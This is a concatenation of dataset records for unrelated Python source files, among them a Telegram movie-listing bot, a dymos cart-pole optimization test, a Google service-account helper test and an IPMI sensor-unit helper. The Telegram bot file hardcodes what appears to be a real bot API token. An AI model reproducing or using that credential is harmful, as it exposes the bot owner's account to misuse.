'lte-rrc.sr_ConfigIndex':\n sr_sonfigidx = int(field.get('show'))\n if sr_sonfigidx < 4:\n sr_period = 5\n elif 4 < sr_sonfigidx < 15:\n sr_period = 10\n elif 14 < sr_sonfigidx < 35:\n sr_period = 20\n elif 34 < sr_sonfigidx < 75:\n sr_period = 40\n elif 74 < sr_sonfigidx < 155:\n sr_period = 80\n elif 154 < sr_sonfigidx < 157:\n sr_period = 2\n elif sr_sonfigidx == 157:\n sr_period = 1\n else:\n self.log_warning(\"Unknown sr_ConfigIndex: \" + str(sr_sonfigidx))\n continue\n self.log_info(\"SR period: \" + str(sr_period) + ' ms, SR ConfigIdx: ' + str(sr_sonfigidx))\n bcast_dict = {}\n bcast_dict['period'] = str(sr_period)\n bcast_dict['config idx'] = str(sr_sonfigidx)\n bcast_dict['timestamp'] = str(msg.timestamp)\n self.broadcast_info('SR_CONFIGIDX', bcast_dict)\n self.store_kpi('KPI_CONFIGURATION_SR_CONFIG_IDX', str(sr_period), msg.timestamp)\n return 0\n\n\n\n\n\n","repo_name":"mobile-insight/mobileinsight-core","sub_path":"mobile_insight/analyzer/kpi/rrc_config_analyzer.py","file_name":"rrc_config_analyzer.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"53"} +{"seq_id":"16046946213","text":"import logging\n\nfrom aiogram import Bot, Dispatcher, executor, types\n\nfrom keyboards import *\nfrom films import FILMS\n\nTOKEN=\"5975710242:AAEouA2SuCBQ08a4_PkTSTTUaVK90YVfLKc\"\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot)\n\n\n@dp.message_handler(commands='start')\nasync def start(message: types.Message):\n await message.answer(text='Привіт! Я - бот-кіноафіша. Обери фільм, про який ти хочеш дізнатися.', reply_markup=film_choice)\n\n\n@dp.callback_query_handler()\nasync def get_film_info(callback_query: types.CallbackQuery):\n if callback_query.data == 'Джон Уік 4 (16+)':\n await bot.send_photo(callback_query.message.chat.id, FILMS[callback_query.data][\"photo\"])\n url= FILMS[callback_query.data][\"site_url\"]\n film_rating = FILMS[callback_query.data][\"rating\"]\n film_description = FILMS[callback_query.data][\"description\"]\n message = f\"Film url: {url}\\nAbout: {film_description}\\n\\nRate: {film_rating}\"\n await bot.send_message(callback_query.message.chat.id, message, parse_mode='html')\n elif callback_query.data == 'Підземелля і дракони':\n await bot.send_photo(callback_query.message.chat.id, FILMS[callback_query.data][\"photo\"])\n url= FILMS[callback_query.data][\"site_url\"]\n film_rating = FILMS[callback_query.data][\"rating\"]\n film_description = FILMS[callback_query.data][\"description\"]\n message = f\"Film url: {url}\\nAbout: {film_description}\\n\\nRate: {film_rating}\"\n await bot.send_message(callback_query.message.chat.id, message, parse_mode='html')\n elif callback_query.data == 'Екзорцист Ватикану':\n await bot.send_photo(callback_query.message.chat.id, FILMS[callback_query.data][\"photo\"])\n url= FILMS[callback_query.data][\"site_url\"]\n film_rating = FILMS[callback_query.data][\"rating\"]\n film_description = FILMS[callback_query.data][\"description\"]\n message = f\"Film url: {url}\\nAbout: {film_description}\\n\\nRate: {film_rating}\"\n await bot.send_message(callback_query.message.chat.id, message, parse_mode='html')\n\n# @dp.message_handler()\n# async def echo(message: types.Message):\n# user_info = {\n# \"name\": message.from_user.first_name,\n# \"surname\": message.from_user.last_name,\n# \"username\": message.from_user.username,\n# \"user_id\": message.from_user.id\n# }\n# await message.answer(f'First name: {user_info[\"name\"]}\\nLast name: {user_info[\"surname\"]}\\nUsername: {user_info[\"username\"]}\\nUser id: {user_info[\"user_id\"]}')\n# await message.answer(message.text)\n\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)","repo_name":"Misha304/python-","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21316804057","text":"# 给定一个二叉树,我们在树的节点上安装摄像头。\r\n# 节点上的每个摄影头都可以监视其父对象、自身及其直接子对象。\r\n# 计算监控树的所有节点所需的最小摄像头数量。\r\nfrom math import inf\r\nfrom typing import Optional\r\n\r\n\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def minCameraCover(self, root: Optional[TreeNode]) -> int:\r\n def dfs(root:TreeNode):\r\n if root is None:\r\n return inf,0,0\r\n l_choose,l_by_fa,l_by_son = dfs(root.left)\r\n r_choose,r_by_fa,r_by_son = dfs(root.right)\r\n choose = min(l_choose,l_by_fa,l_by_son) + min(r_choose,r_by_fa,r_by_son) + 1\r\n by_fa = min(l_choose,l_by_son) + min(r_choose,r_by_son)\r\n by_son = min(l_choose+r_by_son,l_by_son+r_choose,l_choose+r_choose)\r\n return choose,by_fa,by_son\r\n\r\n choose, _, by_son = dfs(root)\r\n return min(choose, by_son)\r\n","repo_name":"Ww0225/pythonTest","sub_path":"监控二叉树.py","file_name":"监控二叉树.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26165690461","text":"import logging\nfrom multiprocessing import Queue, Event\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nimport time\nimport scipy.signal as sg\nfrom bang_bang_controller import BangBangController\nfrom sensor_message_item import SensorMessageItem\n\n# An example of using logging.basicConfig rather than logging.fileHandler()\nlogging.basicConfig(level=logging.DEBUG,\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\nlogger = logging.getLogger(__name__)\n\n\ndef sine_wave(x, min_max_range, frequency):\n min_val, max_val = min_max_range\n amplitude = (max_val - min_val) / 2\n\n # Convert frequency from milliseconds to seconds\n frequency_sec = frequency / 1000.0\n\n # Generate the sine wave\n y = amplitude * np.sin(2 * np.pi * (x / frequency_sec)) + amplitude + min_val\n\n return y\n\n\ndef triangle_wave_sg(x, min_max_range, frequency):\n min_val, max_val = min_max_range\n amplitude = (max_val - min_val)\n y = amplitude * sg.sawtooth(frequency * 2 * np.pi * x, width=0.5)\n return y\n\n\ndef triangle_wave(x, min_max_range, frequency):\n min_val, max_val = min_max_range\n amplitude = (max_val - min_val)\n min_val = min_val - amplitude\n\n # Convert frequency from milliseconds to seconds for compatibility with numpy\n frequency_sec = frequency / 1000.0\n\n # Generate the triangle wave\n y = amplitude * np.abs(2 * (x / frequency_sec - np.floor(0.5 + x / frequency_sec))) + amplitude + min_val\n\n return y\n\n\ndef plot_temperature(x_values, y_values, title):\n # Convert current time in milliseconds to a datetime object\n current_time = int(time.time() * 1000)\n current_datetime = datetime.datetime.fromtimestamp(current_time / 1000)\n\n # Create future datetime objects by adding x values (milliseconds) to current time\n x_datetimes = [current_datetime + datetime.timedelta(milliseconds=int(x)) for x in x_values]\n\n # Plotting\n plt.figure(figsize=(10, 6))\n plt.plot(x_datetimes, y_values, label='Temperature')\n plt.xlabel('Time')\n plt.ylabel('Temperature')\n plt.title(title)\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.legend()\n plt.show()\n\n\ndef main():\n # simulate 2 hours of data at 30 second intervals\n\n # Example usage\n time_range = 2 * 60 * 60 * 1000 # 2 hours\n interval = 30 * 1000 # every 30 seconds\n n_values = int(time_range / interval)\n\n x_values = np.linspace(0, time_range, n_values) # x values in milliseconds\n min_max_range = (20, 30) # Simulated temperature range\n\n # how often does the temperature go through a complete cycle from 20 to 30\n frequency = 120000 # Frequency in milliseconds (2 minutes)\n\n temperature_values = triangle_wave(x_values, min_max_range, frequency)\n\n plot_temperature(x_values, temperature_values, 'Simulated Temperature Over Time')\n\n sensor_message_items: list[SensorMessageItem] = list()\n\n for i, sensor_value in enumerate(temperature_values):\n timestamp = x_values[i]\n sensor_message_item = SensorMessageItem(303721692, 248, float(sensor_value), int(timestamp))\n sensor_message_items.append(sensor_message_item)\n\n message_queue = Queue()\n sig_event = Event()\n bang_bang_controller = BangBangController(message_queue, sig_event)\n bang_bang_controller.start()\n\n # now do the simulation\n for sensor_message_item in sensor_message_items:\n print(\"Injecting sensor message:{}\".format(sensor_message_item))\n message_queue.put(sensor_message_item)\n time.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ElDuderino/BangBangController","sub_path":"test_bang_bang_controller.py","file_name":"test_bang_bang_controller.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13729578469","text":"\nimport pytest\nfrom lkmltools.google_auth_helper import GoogleAuthHelper\nimport os\nimport json\n\n@pytest.fixture(scope=\"module\")\ndef get_raw_json():\n raw_json = {\n \"type\": \"service_account\",\n \"project_id\": \"someproject\",\n \"private_key_id\": \"xxx\",\n \"private_key\": \"-----BEGIN PRIVATE KEY-----\\nxxx-----END PRIVATE KEY-----\\n\",\n \"client_email\": \"someuser@appspot.gserviceaccount.com\",\n \"client_id\": \"1234567890\",\n \"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\n \"token_uri\": \"https://oauth2.googleapis.com/token\",\n \"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\n \"client_x509_cert_url\": \"https://www.googleapis.com/robot/v1/metadata/x509/someuser%40appspot.gserviceaccount.com\"\n }\n return raw_json\n\n@pytest.fixture(scope=\"module\")\ndef get_encoded_json():\n # this is the encoded version of the raw_json above, so doesn't contain any proper secrets. \n # The unit tests below confirm that decoding this byte string below matches the JSON above\n return b'eyd0eXBlJzogJ3NlcnZpY2VfYWNjb3VudCcsICdwcm9qZWN0X2lkJzogJ3NvbWVwcm9qZWN0JywgJ3ByaXZhdGVfa2V5X2lkJzogJ3h4eCcsICdwcml2YXRlX2tleSc6ICctLS0tLUJFR0lOIFBSSVZBVEUgS0VZLS0tLS1cbnh4eC0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS1cbicsICdjbGllbnRfZW1haWwnOiAnc29tZXVzZXJAYXBwc3BvdC5nc2VydmljZWFjY291bnQuY29tJywgJ2NsaWVudF9pZCc6ICcxMjM0NTY3ODkwJywgJ2F1dGhfdXJpJzogJ2h0dHBzOi8vYWNjb3VudHMuZ29vZ2xlLmNvbS9vL29hdXRoMi9hdXRoJywgJ3Rva2VuX3VyaSc6ICdodHRwczovL29hdXRoMi5nb29nbGVhcGlzLmNvbS90b2tlbicsICdhdXRoX3Byb3ZpZGVyX3g1MDlfY2VydF91cmwnOiAnaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vb2F1dGgyL3YxL2NlcnRzJywgJ2NsaWVudF94NTA5X2NlcnRfdXJsJzogJ2h0dHBzOi8vd3d3Lmdvb2dsZWFwaXMuY29tL3JvYm90L3YxL21ldGFkYXRhL3g1MDkvc29tZXVzZXIlNDBhcHBzcG90LmdzZXJ2aWNlYWNjb3VudC5jb20nfQ=='\n\ndef test_encode_service_account():\n helper = GoogleAuthHelper()\n encoded_json = helper.encode_service_account(get_raw_json())\n assert encoded_json == get_encoded_json()\n \ndef test_decode_service_account():\n helper = GoogleAuthHelper()\n decoded_json = helper.decode_service_account(get_encoded_json())\n assert decoded_json == get_raw_json()\n\ndef test_write_decoded_sa_json_to_file():\n helper = GoogleAuthHelper()\n filename = \"tmp_test_decoded.json\"\n\n if os.path.exists(filename):\n os.remove(filename)\n\n helper.write_decoded_sa_json_to_file(get_encoded_json(), filename=filename)\n\n assert os.path.exists(filename)\n\n with open(filename, 'r') as f:\n data = json.load(f)\n\n assert data == get_raw_json()\n\n if os.path.exists(filename):\n os.remove(filename)\n","repo_name":"ww-tech/lookml-tools","sub_path":"test/test_google_auth_helper.py","file_name":"test_google_auth_helper.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"69873842410","text":"import re\n\nfrom typing import Tuple, List\nfrom .utils import get_mapped_commands\nfrom .errors import TranslationMissing\nfrom .command import Command, cmd_from_info\n\n\nclass Threepio(object):\n \"\"\"\n Threepio Class to translate a command from one framework to another.\n\n :param from_lang: Framework to convert from\n :type from_lang: str\n :param to_lang: Framework to convert to\n :type to_lang: str\n :param framework: Reference to package that represents to_lang\n :type framework: object\n \"\"\"\n\n def __init__(self, from_lang: str, to_lang: str, framework: object):\n \"\"\"Initialize a Threepio object to translate commands.\"\"\"\n\n # Fetch a dictionary of mapped commands between frameworks\n self.commands = get_mapped_commands()\n # Assert framework to convert from is present in mapped commands\n assert from_lang in self.commands, f\"\\\"{from_lang}\\\" is not in the mapped commands.\"\n self.from_lang = from_lang\n self.to_lang = to_lang\n self.framework = framework\n\n def _normalize_func_name(self, name: str) -> str:\n \"\"\"Normalizes a function name to lower case and keep only alphabets\n\n :param name: function name to normalize\n :type name: str\n\n :return: returns a string converted to lowercase keeping only alphabets\n :rtype: str\n \"\"\"\n alpha = re.compile(\"[^a-zA-Z]\")\n return alpha.sub(\"\", name).lower()\n\n def _order_args(\n self, cmd: Command, from_info: dict, to_info: dict\n ) -> Tuple[list, dict]:\n \"\"\"Extracts and orders the args and kwargs according to translated command\n\n :param cmd: command to be translated\n :type cmd: Command\n :param from_info: Dictionary of info for the command for the `from` framework\n :type from_info: dict\n :param to_info: Dictionary of info for the command for the `to` framework\n :type to_info: dict\n\n :return: Returns ordered - args and kwargs\n :rtype: Tuple[list, dict]\n \"\"\"\n new_args = []\n new_kwargs = {}\n\n def get_to_arg_index(from_arg):\n \"\"\"Returns index for the original argument in the translated command arguments list\n\n :param from_arg: info of ith argument of 'from' framework\n :type from_arg: dict\n\n :return: returns the index of original argument or None\n :rtype: int or None\n \"\"\"\n return next(\n (\n index\n for index, d in enumerate(to_info[\"args\"])\n if d[\"name\"] == from_arg.get(self.to_lang, None)\n ),\n None,\n )\n\n # Loop through the command arguments For eg. Tensors to perform operation to\n for i, arg in enumerate(cmd.args):\n # Extract the info of ith argument of `from` framework\n from_arg = from_info[\"args\"][i]\n # Check if the same name argument is present in `to` framework\n # If yes, get its index\n to_arg_index = get_to_arg_index(from_arg)\n\n # Append arguments which don't have same name between frameworks\n if to_arg_index is None:\n new_args.append(arg)\n continue\n\n # Append arguments with same names at the proper position of the `to` framework\n new_args.insert(to_arg_index, arg)\n\n # Add static args, if any\n for from_arg in from_info[\"args\"]:\n if \"value\" in from_arg:\n to_arg_index = get_to_arg_index(from_arg)\n if to_arg_index is not None:\n new_args.insert(to_arg_index, from_arg[\"value\"])\n\n # If any kwargs are normal args, splice them in as well\n for k, v in cmd.kwargs.items():\n # Map kwargs similarly if provided\n from_arg = [a for a in from_info[\"args\"] if a[\"name\"] == k][0]\n to_arg_index = next(\n (\n index\n for index, d in enumerate(to_info[\"args\"])\n if d[\"name\"] == from_arg.get(self.to_lang, {})\n ),\n None,\n )\n\n if to_arg_index is None:\n new_kwargs[k] = v\n continue\n\n new_args.insert(to_arg_index, v)\n\n return new_args, new_kwargs\n\n def translate_multi(self, orig_cmd, commands_info):\n \"\"\"Translates command which has multiple translated chained commands\n\n :param orig_cmd: command to be translated\n :type orig_cmd: Command\n :param commands_info: chained commmands with info\n :type commands_info: list\n\n :return: Returns translated commands\n :rtype: list\n \"\"\"\n cmd_config = commands_info.pop(0)\n store = {}\n for i, arg in enumerate(orig_cmd.args):\n # Store the command arguments\n cmd_config[\"args\"][i][\"value\"] = arg\n store[cmd_config[\"args\"][i][\"name\"]] = arg\n\n new_cmds = [cmd_config]\n for from_info in commands_info:\n # Creates a command given info and arguments with values\n cmd = cmd_from_info(from_info, store)\n\n # Get the info of the command for the framework we want to convert to with the new alias of the command\n to_info = self.commands[self.to_lang][\n self._normalize_func_name(from_info.get(self.to_lang))\n ][0]\n\n new_cmds.append(self.translate_command(cmd, from_info, to_info))\n return new_cmds\n\n def translate_command(self, cmd, from_command, to_command):\n \"\"\"Translates a Command Object after knowing it exists in both frameworks\n\n :param cmd: command to be translated\n :type cmd: Command\n :param from_command: Dictionary of info for the command for the `from` framework\n :type from_command: dict\n :param to_command: Dictionary of info for the command for the `to` framework\n :type to_command: dict\n\n :return: returns a list of translated commands\n :rtype: list\n \"\"\"\n\n translated_cmd = None\n # Extracts and orders the args and kwargs according to translated command\n args, kwargs = self._order_args(cmd, from_command, to_command)\n output = from_command.get(\"placeholder_output\", None)\n # Return a new Command object created after translation with ordered args and kwargs\n return Command(\n to_command[\"name\"],\n args,\n kwargs,\n attrs=to_command[\"attrs\"],\n placeholder_output=output,\n exec_fn=translated_cmd,\n )\n\n def translate(self, cmd: Command) -> List[Command]:\n \"\"\"Translates a Command Object\n\n :param cmd: command to be translated\n :type cmd: Command\n\n :return: returns a list of translated command/s\n :rtype: list\n \"\"\"\n\n # Normalize the function name\n normalized_func_name = self._normalize_func_name(cmd.function_name)\n # Get the info of the command from the framework to be translated from\n from_info = self.commands[self.from_lang].get(normalized_func_name)\n # Throw Exception if the command does not exist in the framework to be translated from\n if from_info is None:\n raise TranslationMissing(cmd.function_name)\n # Check if translated command has multiple chained commands\n if len(from_info) > 1:\n return self.translate_multi(cmd, from_info)\n\n # Extract the info since there is only one command\n from_info = from_info[0]\n\n # Check if the alias of the command exists in the framework to translate to\n if from_info.get(self.to_lang, None) is None:\n raise TranslationMissing(cmd.function_name)\n\n # Get the info of the command for the framework we want to convert to with the new alias of the command\n to_info = self.commands[self.to_lang][\n self._normalize_func_name(from_info.get(self.to_lang))\n ]\n\n return [self.translate_command(cmd, from_info, to_info[0])]\n","repo_name":"OpenMined/Threepio","sub_path":"pythreepio/pythreepio/threepio.py","file_name":"threepio.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"53"} +{"seq_id":"9345284550","text":"import unittest\n\nimport numpy as np\n\nimport openmdao.api as om\nfrom openmdao.utils.assert_utils import assert_near_equal\nfrom openmdao.utils.testing_utils import use_tempdirs, require_pyoptsparse\n\nimport dymos as dm\nfrom dymos.examples.cart_pole.cartpole_dynamics import CartPoleDynamics\n\n\n@use_tempdirs\nclass TestCartPoleOptimization(unittest.TestCase):\n @require_pyoptsparse(optimizer=\"SNOPT\")\n def test_optimization(self):\n\n p = om.Problem()\n\n # --- instantiate trajectory and phase, setup transcription ---\n traj = dm.Trajectory()\n p.model.add_subsystem(\"traj\", traj)\n phase = dm.Phase(\n transcription=dm.GaussLobatto(num_segments=40, order=3, compressed=True, solve_segments=False),\n ode_class=CartPoleDynamics,\n )\n # NOTE: set solve_segments=True to do solver-based shooting\n traj.add_phase(\"phase\", phase)\n\n # --- set state and control variables ---\n phase.set_time_options(fix_initial=True, fix_duration=True, duration_val=2.0, units=\"s\")\n # declare state variables. You can also set lower/upper bounds and scalings here.\n phase.add_state(\"x\", fix_initial=True, lower=-2, upper=2, rate_source=\"x_dot\", shape=(1,), ref=1, defect_ref=1, units=\"m\")\n phase.add_state(\"x_dot\", fix_initial=True, rate_source=\"x_dotdot\", shape=(1,), ref=1, defect_ref=1, units=\"m/s\")\n phase.add_state(\"theta\", fix_initial=True, rate_source=\"theta_dot\", shape=(1,), ref=1, defect_ref=1, units=\"rad\")\n phase.add_state(\"theta_dot\", fix_initial=True, rate_source=\"theta_dotdot\", shape=(1,), ref=1, defect_ref=1, units=\"rad/s\")\n phase.add_state(\n \"energy\", fix_initial=True, rate_source=\"e_dot\", shape=(1,), ref=1, defect_ref=1, units=\"N**2*s\"\n ) # integration of force**2. This does not have the energy unit, but I call it \"energy\" anyway.\n\n # declare control inputs\n phase.add_control(\"f\", fix_initial=False, rate_continuity=False, lower=-20, upper=20, shape=(1,), ref=0.01, units=\"N\")\n\n # add cart-pole parameters (set static_target=True because these params are not time-depencent)\n phase.add_parameter(\"m_cart\", val=1.0, units=\"kg\", static_target=True)\n phase.add_parameter(\"m_pole\", val=0.3, units=\"kg\", static_target=True)\n phase.add_parameter(\"l_pole\", val=0.5, units=\"m\", static_target=True)\n\n # --- set terminal constraint ---\n # alternatively, you can impose those by setting `fix_final=True` in phase.add_state()\n phase.add_boundary_constraint(\"x\", loc=\"final\", equals=1, ref=1.0, units=\"m\") # final horizontal displacement\n phase.add_boundary_constraint(\"theta\", loc=\"final\", equals=np.pi, ref=1.0, units=\"rad\") # final pole angle\n phase.add_boundary_constraint(\"x_dot\", loc=\"final\", equals=0, ref=1.0, units=\"m/s\") # 0 velocity at the and\n phase.add_boundary_constraint(\"theta_dot\", loc=\"final\", equals=0, ref=1.0, units=\"rad/s\") # 0 angular velocity at the end\n phase.add_boundary_constraint(\"f\", loc=\"final\", equals=0, ref=1.0, units=\"N\") # 0 force at the end\n\n # --- set objective function ---\n # we minimize the integral of force**2.\n phase.add_objective(\"energy\", loc=\"final\", ref=1.0)\n\n # --- configure optimizer ---\n p.driver = om.pyOptSparseDriver()\n p.driver.options[\"optimizer\"] = \"IPOPT\"\n # IPOPT options\n p.driver.opt_settings['mu_init'] = 1e-1\n p.driver.opt_settings['max_iter'] = 600\n p.driver.opt_settings['constr_viol_tol'] = 1e-6\n p.driver.opt_settings['compl_inf_tol'] = 1e-6\n p.driver.opt_settings['tol'] = 1e-5\n p.driver.opt_settings['print_level'] = 0\n p.driver.opt_settings['nlp_scaling_method'] = 'gradient-based'\n p.driver.opt_settings['alpha_for_y'] = 'safer-min-dual-infeas'\n p.driver.opt_settings['mu_strategy'] = 'monotone'\n p.driver.opt_settings['bound_mult_init_method'] = 'mu-based'\n p.driver.options['print_results'] = False\n\n # declare total derivative coloring to accelerate the UDE linear solves\n p.driver.declare_coloring()\n\n p.setup(check=False)\n\n # --- set initial guess ---\n # The initial condition of cart-pole (i.e., state values at time 0) is set here\n # because we set `fix_initial=True` when declaring the states.\n p.set_val(\"traj.phase.t_initial\", 0.0) # set initial time to 0.\n p.set_val(\"traj.phase.states:x\", phase.interp(xs=[0, 1, 2], ys=[0, 1, 1], nodes=\"state_input\"), units=\"m\")\n p.set_val(\"traj.phase.states:x_dot\", phase.interp(xs=[0, 1, 2], ys=[0, 0.1, 0], nodes=\"state_input\"), units=\"m/s\")\n p.set_val(\"traj.phase.states:theta\", phase.interp(xs=[0, 1, 2], ys=[0, np.pi/2, np.pi], nodes=\"state_input\"), units=\"rad\")\n p.set_val(\"traj.phase.states:theta_dot\", phase.interp(xs=[0, 1, 2], ys=[0, 1, 0], nodes=\"state_input\"), units=\"rad/s\")\n p.set_val(\"traj.phase.states:energy\", phase.interp(xs=[0, 1, 2], ys=[0, 30, 60], nodes=\"state_input\"))\n p.set_val(\"traj.phase.controls:f\", phase.interp(xs=[0, 1, 2], ys=[3, -1, 0], nodes=\"control_input\"), units=\"N\")\n\n # --- run optimization ---\n dm.run_problem(p, run_driver=True, simulate=False, simulate_kwargs={\"method\": \"Radau\", \"times_per_seg\": 10})\n\n # --- check outputs ---\n # objective value\n obj = p.get_val(\"traj.phase.states:energy\", units=\"N**2*s\")[-1]\n assert_near_equal(obj, 58.8839489745, tolerance=1e-3)\n\n\nif __name__ == \"___main__\":\n unittest.main()\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/cart_pole/test/test_cartpole_opt.py","file_name":"test_cartpole_opt.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"1591784677","text":"# AOC 2015 - Day 15\n\nimport time\n\nIN_FILE = \"AOC2015\\\\201515.txt\"\n# IN_FILE = \"AOC2015\\\\201515.sample.txt\"\n\ndef parse():\n with open(IN_FILE) as f:\n out = [line for line in f.read().split('\\n')]\n\n # Sprinkles: capacity 5, durability -1, flavor 0, texture 0, calories 5\n ingredients = []\n for x in out:\n ingr, a = x.split(':')\n _,cap,_,dur,_,fla,_,tex,_,cal = a.strip().split(' ')\n ingredients.append(list([ingr,int(cap.strip(',')),int(dur.strip(',')),int(fla.strip(',')),int(tex.strip(',')),int(cal)]))\n\n return ingredients\n\n\ndef part(ingredients): # -> part1: 13882464, part2: 11171160\n imax = 0\n imax500 = 0\n\n for a in range(1,100):\n for b in range(1,100):\n for c in range(1,100):\n for d in range(1,100):\n if a + b + c + d == 100:\n cap = (a * ingredients[0][1]) + (b * ingredients[1][1]) + (c * ingredients[2][1]) + (d * ingredients[3][1])\n dur = (a * ingredients[0][2]) + (b * ingredients[1][2]) + (c * ingredients[2][2]) + (d * ingredients[3][2])\n fla = (a * ingredients[0][3]) + (b * ingredients[1][3]) + (c * ingredients[2][3]) + (d * ingredients[3][3])\n tex = (a * ingredients[0][4]) + (b * ingredients[1][4]) + (c * ingredients[2][4]) + (d * ingredients[3][4])\n cal = (a * ingredients[0][5]) + (b * ingredients[1][5]) + (c * ingredients[2][5]) + (d * ingredients[3][5])\n if cap < 0: cap = 0\n if dur < 0: dur = 0\n if fla < 0: fla = 0\n if tex < 0: tex = 0\n total = cap * dur * fla * tex\n imax = max([imax,total])\n if cal == 500:\n imax500 = max([imax500,total])\n \n return imax,imax500\n\n\nif __name__ == \"__main__\":\n timestart = time.time()\n \n puzzle_input = parse()\n p1,p2 = part(puzzle_input)\n\n print(\"part 1:\",p1)\n print(\"part 2:\",p2)\n \n timeend = time.time()\n print(\"Execution time: \", \"{:.7f}\".format(round(timeend-timestart,7)))\n\n","repo_name":"n7tms/AOC","sub_path":"AOC2015/201515.py","file_name":"201515.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33016369948","text":"# -*- coding= utf-8 -*-\n# @Time : 2021-04-27 10:51\n# @Author : baoguo\n# @File : Day16-异步爬虫.py\n# @Software : PyCharm\nfrom multiprocessing.dummy import Pool\nimport time\n\nstart_time = time.time()\n\n\ndef get_page(str):\n print(\"正在下载: \", str)\n time.sleep(2)\n print(\"下载成功 \", str)\n\n\nname_list = [\"zbg\", 'xg', 'dc', 'zh']\n\n# 实例化线程池对象\npool = Pool(4)\n# 将列表中每一个列表元素传递给get_page进行处理\npool.map(get_page, name_list)\n\n# for i in range(len(name_list)):\n# get_page(name_list[i])\n\nend_time = time.time()\n\nprint('%d seconde' % (end_time - start_time))\n\n","repo_name":"S180231891/PaChong","sub_path":"Day16-异步爬虫.py","file_name":"Day16-异步爬虫.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73569319527","text":"#!/usr/bin/env python\nfrom math import floor, log10\n\n\n_units2_table = [\n \"\", \"C\", \"F\", \"K\", \"V\", \"A\", \"W\", \"J\", \"Coulombs\", \"VA\",\n \"Nits\", \"lumen\", \"lux\", \"Candela\", \"kPa\", \"PSI\", \"N\", \"CFM\", \"RPM\", \"Hz\",\n \"microsecond\", \"millisecond\", \"sec\", \"min\", \"hour\", \"day\", \"week\", \"mil\",\n \"inch\", \"ft\", \"cu in\", \"cu feet\", \"mm\", \"cm\", \"m\", \"cu cm\", \"cu m\", \"l\",\n \"fluid ounce\", \"radians\", \"steradians\", \"rev\", \"hz\", \"gravities\", \"ounce\",\n \"pound\", \"ft-lb\", \"oz-in\", \"gauss\", \"gilberts\", \"henry\", \"millihenry\",\n \"farad\", \"microfarad\", \"ohms\", \"siemens\", \"mole\", \"becquerel\",\n \"PPM (parts/million)\", \"reserved\", \"Decibels\", \"DbA\", \"DbC\", \"gray\",\n \"sievert\", \"color K\", \"bit\", \"Kb\", \"Mb\", \"Gb\", \"B\", \"KB\", \"MB\", \"gigabyte\",\n \"word\", \"dword\", \"qword\", \"line\", \"hit\", \"miss\", \"retry\", \"reset\",\n \"overrun / overflow\", \"underrun\", \"collision\", \"packets\", \"msgs\",\n \"characters\", \"error\", \"correctable error\", \"uncorrectable error\",\n \"fatal error\", \"grams\"\n]\n\n_units1_rate_table = [\"\", \"uS\", \"mS\", \"s\", \"min\", \"hr\", \"day\", \"\"]\n_units1_mod_table = [\"\", \"/\", \"*\", \"\"]\n\nhs_states2string = {\n 0x80: \"Con lost\",\n 0x40: \"Deactivating\",\n 0x20: \"Deact Req\",\n 0x10: \"Active\",\n 0x08: \"Activating\",\n 0x04: \"Act Req\",\n 0x02: \"Inactive\",\n 0x01: \"N/A\"\n}\n\nthreshold_offsets_msg = [\n \"Lower Non-critical - going low\",\n \"Lower Non-critical - going high\",\n \"Lower Critical - going low\",\n \"Lower Critical - going high\",\n \"Lower Non-recoverable - going low\",\n \"Lower Non-recoverable - going high\",\n \"Upper Non-critical - going low\",\n \"Upper Non-critical - going high\",\n \"Upper Critical - going low\",\n \"Upper Critical - going high\",\n \"Upper Non-recoverable - going low\",\n \"Upper Non-recoverable - going high\",\n \"Unknown\",\n \"Unknown\",\n \"Unknown\",\n \"Unknown\",\n]\n\n\ndef get_sdr_egu(entry):\n unit1 = entry.units_1\n unit2 = entry.units_2\n rate_part = (unit1 >> 3) & 0x7\n mod_part = (unit1 >> 1) & 0x3\n percentage = '% ' if unit1 & 0x1 else ''\n base_unit = _units2_table[unit2]\n mod_unit = _units1_mod_table[mod_part]\n rate_unit = _units1_rate_table[rate_part]\n return (percentage + base_unit\n + ((mod_unit + rate_unit) if rate_unit else \"\")).strip()\n\n\ndef get_sdr_prec(entry):\n delta = entry.convert_sensor_raw_to_value(0) - \\\n entry.convert_sensor_raw_to_value(1)\n offset = entry.convert_sensor_raw_to_value(0)\n delta_frac = delta % 1\n offset_frac = offset % 1\n prec = 0\n if delta_frac != 0.0:\n prec = int(max(prec, -floor(log10(abs(delta_frac)))))\n\n if offset_frac != 0.0:\n prec = int(max(prec, -floor(log10(abs(offset_frac)))))\n\n return 